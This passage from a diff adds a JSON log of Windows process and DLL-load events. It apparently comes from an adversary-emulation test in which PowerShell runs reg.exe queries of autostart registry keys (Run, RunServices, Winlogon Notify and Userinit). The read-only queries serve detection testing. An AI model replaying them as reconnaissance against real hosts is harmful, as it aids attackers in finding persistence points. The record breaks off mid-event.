+ "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311360000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7408, + "ppid": 5512, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311550000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "process", + "pid": 7408, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001061AC5001}" + }, + { + "event_type": "process", + "pid": 5512, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311520000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00106DAB5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 2528, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311710000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 2528, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571311800000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311680000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "process", + "pid": 5276, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010ACAE5001}" + }, + { + "event_type": "process", + "pid": 2528, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010B8AD5001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6296, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571311970000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311830000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "command_line": "reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 6296, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312070000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001004B05001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571311990000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010F9B05001}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001004B05001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1860, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312230000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312140000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "command_line": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6328, + "ppid": 1860, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312320000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-001052B25001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "process", + "pid": 6328, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "terminate", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001046B35001}" + }, + { + "event_type": "process", + "pid": 1860, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883571312300000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-001052B25001}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 524, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883571312470000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 524, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}" + }, + { + "command_line": "reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6052, + "ppid": 524, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "subtype": "create", + "timestamp": 131883571312560000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}", + "unique_ppid": "{42FC7E13-CB0B-5C05-0000-00109AB45001}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "reg.exe", + "image_path": "C:\\Windows\\System32\\reg.exe", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": "{42FC7E13-CB0B-5C05-0000-00108EB55001}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6052, + "process_name": "reg.exe", + "process_path": "C:\\Windows\\System32\\reg.exe", + "timestamp": 131883571312460000, + "unique_pid": 